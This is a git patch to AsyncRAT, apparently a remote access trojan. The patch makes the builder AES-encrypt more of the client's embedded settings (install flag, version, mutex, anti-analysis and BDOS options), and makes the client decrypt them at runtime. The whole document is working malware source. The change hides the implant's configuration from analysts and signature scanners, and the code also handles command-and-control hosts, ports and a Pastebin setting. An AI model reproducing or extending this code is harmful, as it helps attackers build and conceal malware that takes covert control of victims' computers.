From 3c3dc92a75c4db4d978460203d2ac56f62f4d72f Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Wed, 29 May 2019 19:47:39 +0300 Subject: [PATCH] Encrypt the other settings --- AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs | 13 ++++++++----- AsyncRAT-C#/Client/Settings.cs | 9 +++++++-- 2 files changed, 15 insertions(+), 7 deletions(-) diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs index 187178f..62b8f97 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs @@ -153,22 +153,25 @@ namespace AsyncRAT_Sharp.Forms } if (operand == "%Install%") - methodDef.Body.Instructions[i].Operand = checkBox1.Checked.ToString().ToLower(); + methodDef.Body.Instructions[i].Operand = aes.Encrypt(checkBox1.Checked.ToString().ToLower()); if (operand == "%Folder%") methodDef.Body.Instructions[i].Operand = comboBoxFolder.Text; if (operand == "%File%") - methodDef.Body.Instructions[i].Operand = textFilename.Text; + methodDef.Body.Instructions[i].Operand = textFilename.Text; + + if (operand == "%Version%") + methodDef.Body.Instructions[i].Operand = aes.Encrypt(Settings.Version); if (operand == "%Key%") methodDef.Body.Instructions[i].Operand = Convert.ToBase64String(Encoding.UTF8.GetBytes(key)); if (operand == "%MTX%") - methodDef.Body.Instructions[i].Operand = txtMutex.Text; + methodDef.Body.Instructions[i].Operand = aes.Encrypt(txtMutex.Text); if (operand == "%Anti%") - methodDef.Body.Instructions[i].Operand = chkAnti.Checked.ToString().ToLower(); + methodDef.Body.Instructions[i].Operand = aes.Encrypt(chkAnti.Checked.ToString().ToLower()); if (operand == "%Certificate%") methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(serverCertificate.Export(X509ContentType.Cert))); @@ -177,7 +180,7 @@ namespace AsyncRAT_Sharp.Forms methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature)); if (operand == "%BDOS%") - methodDef.Body.Instructions[i].Operand = chkBdos.Checked.ToString().ToLower(); + methodDef.Body.Instructions[i].Operand = aes.Encrypt(chkBdos.Checked.ToString().ToLower()); if (operand == "%Pastebin%") if (chkPastebin.Checked) diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs index d886575..f2a74b3 100644 --- a/AsyncRAT-C#/Client/Settings.cs +++ b/AsyncRAT-C#/Client/Settings.cs @@ -28,7 +28,7 @@ namespace Client #else public static string Ports = "%Ports%"; public static string Hosts = "%Hosts%"; - public static string Version = "0.4.9E"; + public static string Version = "%Version%"; public static string Install = "%Install%"; public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%Folder%"), "%File%"); public static string Key = "%Key%"; @@ -36,7 +36,7 @@ namespace Client public static string Certificate = "%Certificate%"; public static string Serversignature = "%Serversignature%"; public static X509Certificate2 ServerCertificate; - public static readonly string Anti = "%Anti%"; + public static string Anti = "%Anti%"; public static Aes256 aes256; public static string Pastebin = "%Pastebin%"; public static string BDOS = "%BDOS%"; @@ -54,7 +54,12 @@ namespace Client aes256 = new Aes256(Key); Ports = aes256.Decrypt(Ports); Hosts = aes256.Decrypt(Hosts); + Version = aes256.Decrypt(Version); + Install = aes256.Decrypt(Install); + MTX = aes256.Decrypt(MTX); Pastebin = aes256.Decrypt(Pastebin); + Anti = aes256.Decrypt(Anti); + BDOS = aes256.Decrypt(BDOS); Serversignature = aes256.Decrypt(Serversignature); ServerCertificate = new X509Certificate2(Convert.FromBase64String(aes256.Decrypt(Certificate))); return VerifyHash();